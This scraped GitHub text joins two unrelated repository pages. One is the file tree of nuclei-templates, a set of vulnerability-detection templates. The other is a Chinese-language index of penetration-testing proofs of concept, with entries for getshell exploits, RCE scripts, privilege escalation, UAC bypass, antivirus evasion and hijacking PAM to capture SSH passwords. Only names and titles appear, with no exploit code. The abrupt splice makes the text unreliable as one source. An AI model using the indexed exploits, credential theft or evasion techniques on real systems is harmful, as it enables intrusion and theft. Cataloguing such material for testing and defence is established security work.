├── CVE-2018-0296.yaml │   ├── CVE-2018-1000129.yaml │   ├── CVE-2018-11409.yaml │   ├── CVE-2018-11759.yaml │   ├── CVE-2018-1247.yaml │   ├── CVE-2018-1271.yaml │   ├── CVE-2018-13379.yaml │   ├── CVE-2018-14728.yaml │   ├── CVE-2018-16341.yaml │   ├── CVE-2018-18069.yaml │   ├── CVE-2018-19439.yaml │   ├── CVE-2018-20824.yaml │   ├── CVE-2018-2791.yaml │   ├── CVE-2018-3714.yaml │   ├── CVE-2018-3760.yaml │   ├── CVE-2018-5230.yaml │   ├── CVE-2018-7490.yaml │   ├── CVE-2019-10475.yaml │   ├── CVE-2019-11510.yaml │   ├── CVE-2019-12314.yaml │   ├── CVE-2019-14322.yaml │   ├── CVE-2019-14974.yaml │   ├── CVE-2019-15043.yaml │   ├── CVE-2019-16759.yaml │   ├── CVE-2019-17382.yaml │   ├── CVE-2019-18394.yaml │   ├── CVE-2019-19368.yaml │   ├── CVE-2019-19781.yaml │   ├── CVE-2019-19908.yaml │   ├── CVE-2019-19985.yaml │   ├── CVE-2019-2588.yaml │   ├── CVE-2019-3396.yaml │   ├── CVE-2019-3799.yaml │   ├── CVE-2019-5418.yaml │   ├── CVE-2019-8449.yaml │   ├── CVE-2019-8451.yaml │   ├── CVE-2019-8903.yaml │   ├── CVE-2019-8982.yaml │   ├── CVE-2020-10199.yaml │   ├── CVE-2020-10204.yaml │   ├── CVE-2020-1147.yaml │   ├── CVE-2020-12720.yaml │   ├── CVE-2020-13167.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-3187.yaml │   ├── CVE-2020-3452.yaml │   ├── CVE-2020-5284.yaml │   ├── CVE-2020-5405.yaml │   ├── CVE-2020-5410.yaml │   ├── CVE-2020-5902.yaml │   ├── CVE-2020-6287.yaml │   ├── CVE-2020-7209.yaml │   ├── CVE-2020-7961.yaml │   ├── CVE-2020-8091.yaml │   ├── CVE-2020-8115.yaml │   ├── CVE-2020-8191.yaml │   ├── CVE-2020-8193.yaml │   ├── CVE-2020-8194.yaml │   ├── CVE-2020-8512.yaml │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9484.yaml │   └── CVE-2020-9757.yaml ├── dns │   ├── azure-takeover-detection.yaml │   ├── cname-service-detector.yaml │   ├── dead-host-with-cname.yaml │   └── servfail-refused-hosts.yaml ├── files │   ├── apc-info.yaml │   ├── cgi-test-page.yaml │   ├── debug-pprof.yaml │   ├── dir-listing.yaml │   ├── docker-registry.yaml │   ├── drupal-install.yaml │   ├── elasticsearch.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml │   ├── filezilla.yaml │   ├── firebase-detect.yaml │   ├── git-config.yaml │   ├── htaccess-config.yaml │   ├── jkstatus-manager.yaml │   ├── jolokia.yaml │   ├── laravel-env.yaml │   ├── lazy-file.yaml │   ├── phpinfo.yaml │   ├── public-tomcat-instance.yaml │   ├── security.txt.yaml │   ├── server-status-localhost.yaml │   ├── telerik-dialoghandler-detect.yaml │   ├── telerik-fileupload-detect.yaml │   ├── tomcat-scripts.yaml │   ├── wadl-files.yaml │   ├── web-config.yaml │   ├── wordpress-directory-listing.yaml │   ├── wordpress-user-enumeration.yaml │   ├── wp-xmlrpc.yaml │   └── zip-backup-files.yaml ├── panels │   ├── atlassian-crowd-panel.yaml │   ├── cisco-asa-panel.yaml │   ├── citrix-adc-gateway-detect.yaml │   ├── compal.yaml │   ├── crxde.yaml │   ├── docker-api.yaml │   ├── fortinet-fortigate-panel.yaml │   ├── globalprotect-panel.yaml │   ├── grafana-detect.yaml │   ├── jenkins-asyncpeople.yaml │   ├── jmx-console.yaml │   ├── kubernetes-pods.yaml │   ├── mongo-express-web-gui.yaml │   ├── parallels-html-client.yaml │   ├── phpmyadmin-panel.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml │   ├── sap-netweaver-detect.yaml │   ├── sap-recon-detect.yaml │   ├── sophos-fw-version-detect.yaml │   ├── supervpn-panel.yaml │   ├── swagger-panel.yaml │   ├── tikiwiki-cms.yaml │   ├── weave-scope-dashboard-detect.yaml │   └── webeditors.yaml ├── payloads │   └── CVE-2020-6287.xml ├── security-misconfiguration │   ├── basic-cors-flash.yaml │   ├── basic-cors.yaml │   ├── front-page-misconfig.yaml │   ├── jira-service-desk-signup.yaml │   ├── jira-unauthenticated-dashboards.yaml │   ├── jira-unauthenticated-popular-filters.yaml │   ├── jira-unauthenticated-projects.yaml │   ├── jira-unauthenticated-user-picker.yaml │   ├── rabbitmq-default-admin.yaml │   ├── rack-mini-profiler.yaml │   ├── springboot-detect.yaml │   └── wamp-xdebug-detect.yaml ├── subdomain-takeover │   ├── detect-all-takeovers.yaml │   └── s3-subtakeover.yaml ├── technologies │   ├── bigip-config-utility-detect.yaml │   ├── citrix-vpn-detect.yaml │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── graphql.yaml │   ├── home-assistant.yaml │   ├── jaspersoft-detect.yaml │   ├── jira-detect.yaml │   ├── liferay-portal-detect.yaml │   ├── linkerd-badrule-detect.yaml │   ├── linkerd-ssrf-detect.yaml │   ├── netsweeper-webadmin-detect.yaml │   ├── ntlm-directories.yaml │   ├── prometheus-exposed-panel.yaml │   ├── s3-detect.yaml │   ├── sap-netweaver-as-java-detect.yaml │   ├── sap-netweaver-detect.yaml │   ├── sql-server-reporting.yaml │   ├── tech-detect.yaml │   ├── weblogic-detect.yaml │   └── werkzeug-debugger-detect.yaml ├── tokens │   ├── amazon-mws-auth-token-value.yaml │   ├── aws-access-key-value.yaml │   ├── google-api-key.yaml │   ├── http-username-password.yaml │   ├── mailchimp-api-key.yaml │   └── slack-access-token.yaml ├── vulnerabilities │   ├── cached-aem-pages.yaml │   ├── couchdb-adminparty.yaml │   ├── crlf-injection.yaml │   ├── discourse-xss.yaml │   ├── git-config-nginxoffbyslash.yaml │   ├── ibm-infoprint-directory-traversal.yaml │   ├── microstrategy-ssrf.yaml │   ├── moodle-filter-jmol-lfi.yaml │   ├── moodle-filter-jmol-xss.yaml │   ├── nginx-module-vts-xss.yaml │   ├── open-redirect.yaml │   ├── oracle-ebs-bispgraph-file-access.yaml │   ├── pdf-signer-ssti-to-rce.yaml │   ├── rce-shellshock-user-agent.yaml │   ├── rce-via-java-deserialization.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows ├── bigip-pwner-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml ├── netsweeper-preauth-rce-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml └── springboot-pwner-workflow.yaml 13 directories, 204 templates. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. Notes: Use YAMLlint (e.g. yamllint) to validate new templates when sending pull requests. Use YAML Formatter (e.g. jsonformatter) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. About Community curated list of template files for the nuclei engine to find security vulnerability and fingerprinting the targets. github.com/projectdiscovery/nuclei Topics nuclei-templates nuclei bugbounty security content-bruteforcing Resources Readme License MIT License Releases 43 v4.0.2 Latest 22 hours ago + 42 releases Contributors 67 + 56 contributors

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Mr-xn committed 0feda91 yesterday update reademe Git stats 537 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time BlueKeep add add bluekeep-CVE-2019-0708-python 8 months ago CVE-2018-6389 add CVE-2018-6389 10 months ago CVE-2019-0211-apache add CVE-2019-0211-apache 9 months ago CVE-2019-0803 add CVE-2019-0803 Win32k漏洞提权工具 9 months ago CVE-2019-11043 add CVE-2019-11043-PHP远程代码执行漏 9 months ago CVE-2019-11510 add CVE-2019-11510 11 months ago CVE-2019-13051 add ThinkCMF漏洞全集和 9 months ago CVE-2019-15107 uplaod 11 months ago CVE-2019-16097 add Harbor remote add admin user 10 months ago CVE-2019-6977-imagecolormatch add CVE-2019-6977-imagecolormatch 9 months ago CVE-2019-8451 add CVE-2019-8451 10 months ago IIS/CVE-2017-7269-Echo-PoC upload img md rb file 11 months ago POC_Details add D-Link Devices - Unauthenticated Remote Command Execution in ssdp… 5 months ago Struts2_045-Poc upload 12 months ago WeblogicScanLot upload about Weblogic 10 months ago books add DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell) 3 days ago discuz-ml-rce update README.md 12 months ago img add 绕过ASM执行powershell脚本 7 days ago jboss_CVE-2017-12149 add jboss_CVE-2017-12149 10 months ago macOS-Kernel-Exploit add macOS-Kernel-Exploit 10 months ago redis-rogue-server upload Redis(<=5.0.5) RCE 10 months ago tools add DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell 3 days ago tp5-getshell add tp3-5getshell&构建ASMX绕过限制WAF达到命令执行 9 months ago zentao-getshell add zentao-getshell 禅道8.2 - 9.2.1前台Getshell 10 months ago Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞.md update 12 months ago Apache Solr RCE via Velocity Template Injection.md add some cve and poc 6 months ago CVE-2019-0708-msf快速搭建.md Update CVE-2019-0708-msf快速搭建.md 10 months ago CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞.md Update CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞.md 11 months ago CVE-2019-15107 Webmin 1.920 远程命令执行漏洞.md add CVE-2019-15107 Webmin 1.920 远程命令执行漏洞 44139-mysql-udf-exploitation… 9 months ago CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞.md add CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞.md 10 months ago CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞.md add CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞 10 months ago CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md add CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd 9 months ago CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞.md add CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞 10 months ago CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞.md add CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞 10 months ago CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell.md add indexhibit cms v2.1.5 直接编辑php文件getshell 10 months ago CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md Update CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md 10 months ago CVE-2019-16920-D-Link-rce.md add CVE-2019-16920-D-Link-rce 9 months ago CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md add CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux… 9 months ago CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md add CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass 9 months ago CVE-2019-2890-Oracle WebLogic 反序列化严重漏洞.md add CVE-2019-2890-Oracle WebLogic 反序列化严重漏洞 9 months ago CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md add CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行 8 months ago CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md add CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行 9 months ago CVE-2020-0554:phpMyAdmin后台SQL注入.md add CVE-2020-0554:phpMyAdmin后台SQL注入 4 months ago CVE-2020-0796检测与修复.md update CVE-2020-0796检测与修复.md 4 months ago CVE-2020-8794-OpenSMTPD 远程命令执行漏洞.md add CVE-2020-8794: OpenSMTPD 远程命令执行漏洞 4 months ago CVE-2020-8813 - Cacti v1.2.8 RCE.md add CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析 5 months ago CVE-2020-9374.md add CVE-2020-9374-TP LINK TL-WR849N - RCE 4 months ago Cobub Razor 0.7.2存在跨站请求伪造漏洞.md update 12 months ago Cobub Razor 0.7.2越权增加管理员账户.md update 12 months ago Cobub Razor 0.8.0存在SQL注入漏洞.md Update Cobub Razor 0.8.0存在SQL注入漏洞.md 12 months ago Cobub Razor 0.8.0存在物理路径泄露漏洞.md update 12 months ago Couch through 2.0存在路径泄露漏洞.md upload 12 months ago DomainMod的XSS集合.md update 12 months ago Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH).md add Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH) 9 months ago FineCMS_v5.0.8两处getshell.md upload 12 months ago Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md update 12 months ago GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md update 12 months ago Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号.md update 12 months ago Joomla-3.4.6-RCE.md update Joomla-3.4.6-RCE 9 months ago LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md update 12 months ago LICENSE Update LICENSE 5 months ago MetInfoCMS 5.X版本GETSHELL漏洞合集.md upload discuz-ml-rce 12 months ago Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md update 12 months ago MiniCMS 1.10存在CSRF漏洞可增加管理员账户.md update 12 months ago PAM劫持SSH密码.md add PAM劫持SSH密码 2 months ago README.md update reademe yesterday S-CMS PHP v3.0存在SQL注入漏洞.md update 12 months ago S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md update 12 months ago ThinkCMF漏洞全集和.md add ThinkCMF漏洞全集和 9 months ago WDJACMS1.5.2模板注入漏洞.md add WDJACMS1.5.2模板注入漏洞.md 6 months ago YzmCMS 3.6存在XSS漏洞.md update 12 months ago Z-Blog 1.5.1.1740存在XSS漏洞.md update 12 months ago ZZCMS201910 SQL Injections.md add zzcms201910 sql注入 6 months ago adduser添加用户.md add adduser添加用户 6 months ago cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md add cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC 8 months ago freeFTP1.0.8-'PASS'远程缓冲区溢出.md freeFTP1.0.8-PASS远程缓冲区溢出 9 months ago indexhibit cms v2.1.5 直接编辑php文件getshell.md update 12 months ago joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户.md update 12 months ago maccms_v10存在CSRF漏洞可增加任意账号.md update 12 months ago rConfig v3.9.2 RCE漏洞.md add rConfig v3.9.2 RCE漏洞 8 months ago showdoc的api_page存在任意文件上传getshell.md add showdoc的api_page存在任意文件上传getshell&xss-demo-超级简单版本的XSS练习demo&xFTP6密码解密 2 months ago solr_rce.md add solre_rce 8 months ago thinkphp5命令执行.md upload 12 months ago thinkphp5框架缺陷导致远程代码执行.md upload 12 months ago typecho反序列化漏洞.md upload 12 months ago yii2-statemachine v2.x.x存在XSS漏洞.md update 12 months ago 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户.md update 12 months ago 华为WS331a产品管理页面存在CSRF漏洞.md upload 12 months ago 天翼创维awifi路由器存在多处未授权访问漏洞.md upload 12 months ago 快速判断sql注入点是否支持load_file.md add 79款 Netgear 路由器遭远程接管0day&代码审计之DTCMS_V5.0后台漏洞两枚&快速判断sql注入点是否支持load… 20 days ago 构建ASMX绕过限制WAF达到命令执行.md Update 构建ASMX绕过限制WAF达到命令执行.md 9 months ago 泛微 e-cology OA 前台SQL注入漏洞.md add 泛微 e-cology OA 前台SQL注入漏洞 9 months ago 泛微OA管理系统RCE漏洞利用脚本.md 泛微OA管理系统RCE漏洞利用脚本.md 10 months ago 泛微e-mobile ognl注入.md add 泛微e-mobile ognl注入&表达式注入.pdf 4 months ago 致远OA_A8_getshell_0day.md upload 12 months ago 通达OA前台任意用户伪造登录漏洞批量检测.md add 通达OA前台任意用户伪造登录漏洞批量检测 3 months ago 通过phpinfo获取cookie突破httponly.md add 通过phpinfo获取cookie突破httponly.md 3 months ago View code README.md Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏洞 华为WS331a产品管理页面存在CSRF漏洞 CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞 D-Link路由器RCE漏洞 CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升 D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621) Huawei HG255 Directory Traversal[目录穿越]|本地备份文件 D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit) 从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘 小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371) Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件) cve-2020-8634&cve-2020-8635|Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程|Wing FTP Server 6.2.5权限提升 CVE-2020-9374-TP LINK TL-WR849N - RCE CVE-2020-12753-LG 智能手机任意代码执行漏洞 CVE-2020-12695-UPnP 安全漏洞 79款 Netgear 路由器遭远程接管0day Web APP 致远OA_A8_getshell_0day Couch through 2.0存在路径泄露漏洞 Cobub Razor 0.7.2存在跨站请求伪造漏洞 joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户 MiniCMS 1.10存在CSRF漏洞可增加管理员账户 Z-Blog 1.5.1.1740存在XSS漏洞 YzmCMS 3.6存在XSS漏洞 Cobub Razor 0.7.2越权增加管理员账户 Cobub Razor 0.8.0存在SQL注入漏洞 Cobub Razor 0.8.0存在物理路径泄露漏洞 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户 DomainMod的XSS集合 GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户 yii2-statemachine v2.x.x存在XSS漏洞 maccms_v10存在CSRF漏洞可增加任意账号 LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户 Finecms_v5.4存在CSRF漏洞可修改管理员账户密码 Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞 Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞 Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号 indexhibit cms v2.1.5 直接编辑php文件getshell S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号 S-CMS PHP v3.0存在SQL注入漏洞 MetInfoCMS 5.X版本GETSHELL漏洞合集 discuz ml RCE 漏洞检测工具 thinkphp5框架缺陷导致远程代码执行 FineCMS_v5.0.8两处getshell Struts2_045漏洞批量检测|搜索引擎采集扫描 thinkphp5命令执行 typecho反序列化漏洞 CVE-2019-10173 Xstream 1.4.10版本远程代码执行 IIS/CVE-2017-7269-Echo-PoC CVE-2019-15107 Webmin RCE thinkphp5 rce漏洞检测工具 thinkphp5_RCE合集 thinkphp3.X-thinkphp5.x 关于ThinkPHP框架的历史漏洞分析集合 CVE-2019-11510 Redis(<=5.0.5) RCE Redis 4.x/5.x RCE(主从复制导致RCE) 生成Redis恶意模块so文件配合主从复制RCE达到命令执行|相关文章 RedisWriteFile-通过 Redis 主从写出无损文件,可用于 Windows 平台下写出无损的 EXE、DLL、 LNK 和 Linux 下的 OS 等二进制文件 WeblogicScanLot系列,Weblogic漏洞批量检测工具 jboss_CVE-2017-12149 Wordpress的拒绝服务(DoS)-CVE-2018-6389 Webmin Remote Code Execution (authenticated)-CVE-2019-15642 CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞 CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞 CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell 泛微OA管理系统RCE漏洞利用脚本 CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit zentao-getshell 禅道8.2 - 9.2.1前台Getshell 泛微 e-cology OA 前台SQL注入漏洞 Joomla-3.4.6-RCE Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH) 构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境) CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd CVE-2019-11043-PHP远程代码执行漏 ThinkCMF漏洞全集和 CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行 ecologyExp.jar-泛微ecology OA系统数据库配置文件读取 freeFTP1.0.8-'PASS'远程缓冲区溢出 rConfig v3.9.2 RCE漏洞 apache_solr_rce CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行 Apache Flink任意Jar包上传导致远程代码执行 用于检测JSON接口令牌安全性测试 cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC CVE-2019-12409_Apache_Solr RCE Shiro RCE (Padding Oracle Attack) CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传 Apache Solr RCE via Velocity Template Injection CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本) CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11) CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本) ZZCMS201910 SQL Injections WDJACMS1.5.2模板注入漏洞 CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution Mysql Client 任意文件读取攻击链拓展 CVE-2020-5504-phpMyAdmin注入(需要登录) CVE-2020-5509-Car Rental Project 1.0版本中存在远程代码执行漏洞 CryptoAPI PoC CVE-2020-0601|另一个PoC for CVE-2020-0601 New Weblogic RCE (CVE-2020-2546、CVE-2020-2551) CVE-2020-2546|WebLogic WLS核心组件RCE分析(CVE-2020-2551)|CVE-2020-2551-Weblogic IIOP 反序列化EXP CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC PHPOK v5.3&v5.4getshell | phpok V5.4.137前台getshell分析 | PHPOK 4.7从注入到getshell thinkphp6 session 任意文件创建漏洞复现 含POC --- 原文在漏洞推送公众号上 ThinkPHP 6.x反序列化POP链(一)|原文链接 ThinkPHP 6.x反序列化POP链(二)|原文链接 ThinkPHP 6.x反序列化POP链(三)|原文链接 WordPress InfiniteWP - Client Authentication Bypass (Metasploit) 【Linux提权/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)使用了不安全的数据会造成SQL注入漏洞环境和POC CVE-2019-17564 : Apache Dubbo反序列化漏洞 CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async) YzmCMS 5.4 后台getshell 关于Ghostcat(幽灵猫CVE-2020-1938漏洞):CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc|Java版本POC|Tomcat-Ajp协议文件读取漏洞|又一个python版本CVE-2020-1938漏洞检测|CVE-2020-1938-漏洞复现环境及EXP CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson) CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)|EXP|CVE-2020-8813MSF利用脚本 CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE CVE-2020-9547:FasterXML/jackson-databind 远程代码执行漏洞 CVE-2020-9548:FasterXML/jackson-databind 远程代码执行漏洞 Apache ActiveMQ 5.11.1目录遍历/ Shell上传 CVE-2020-2555:WebLogic RCE漏洞POC|CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞 CVE-2020-0554:phpMyAdmin后台SQL注入 泛微E-Mobile Ognl 表达式注入|表达式注入.pdf 通达OA RCE漏洞 CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行 CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1) CVE-2020-2555-Oracle Coherence 反序列化漏洞|分析文章 cve-2020-5260-Git凭证泄露漏洞 通达OA前台任意用户伪造登录漏洞批量检测 CVE-2020-11890 JoomlaRCE <3.9.17 远程命令执行漏洞(需要有效的账号密码) CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】 CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3|CVE-2020-2883-Weblogic coherence.jar RCE tongda_oa_rce-通达oa 越权登录+文件上传getshell CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】|CVE-2020-11651&&CVE-2020-11652 EXP showdoc的api_page存在任意文件上传getshell Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法 SpringBoot_Actuator_RCE jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS CVE-2020-9484:Apache Tomcat Session 反序列化代码执行漏洞|CVE-2020-9484:Apache Tomcat 反序列化RCE漏洞的分析和利用 PHPOK 最新版漏洞组合拳 GETSHELL Apache Kylin 3.0.1命令注入漏洞 weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory CVE-2020-5410 Spring Cloud Config目录穿越漏洞 NewZhan CMS 全版本 SQL注入(0day) 盲注 or 联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day) 从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过 CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞 CVE-2020-5902-F5 BIG-IP 远程代代码执行(RCE)&任意文件包含读取 提权辅助相关 windows-kernel-exploits Windows平台提权漏洞集合 windows 溢出提权小记/本地保存了一份+Linux&Windows提取脑图 Windows常见持久控制脑图 CVE-2019-0803 Win32k漏洞提权工具 脏牛Linux提权漏洞 远控免杀从入门到实践之白名单(113个)|远控免杀从入门到实践之白名单(113个)总结篇.pdf Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME Linux权限提升辅助一键检测工具 将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制 CVE-2020-2696 – Local privilege escalation via CDE dtsession CVE-2020-0683-利用Windows MSI “Installer service”提权 Linux sudo提权辅助工具—查找sudo权限配置漏洞 Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞 Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试 linux-kernel-exploits Linux平台提权漏洞集合 Linux提权辅助检测Perl脚本|Linux提权辅助检测bash脚本 CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost|【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe|SMBGhost_RCE_PoC-远程代码执行EXP|Windows_SMBv3_RCE_CVE-2020-0796漏洞复现 getAV---windows杀软进程对比工具单文件版 【Windows提权工具】Windows 7 to Windows 10 / Server 2019|搭配CS的修改版可上线system权限的session 【Windows提权工具】SweetPotato修改版,用于webshell下执行命令|本地编译好的版本|点击下载或右键另存为|SweetPotato_webshell下执行命令版.pdf 【bypass UAC】Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe" 【Windows提权】CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7 【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019|配合文章食用-pipePotato复现|Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功 【Windows提权】Windows 下的提权大合集 【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本 【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法 CVE-2020–1088: Windows wersvc.dll 任意文件删除本地提权漏洞分析 【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP 【Windows提权】CVE-2020-1066-EXP 【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP 【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc 【Linux提权】对Linux提权的简单总结 【Windows提权】wesng-Windows提权辅助脚本 PC 微软RDP远程代码执行漏洞(CVE-2019-0708) 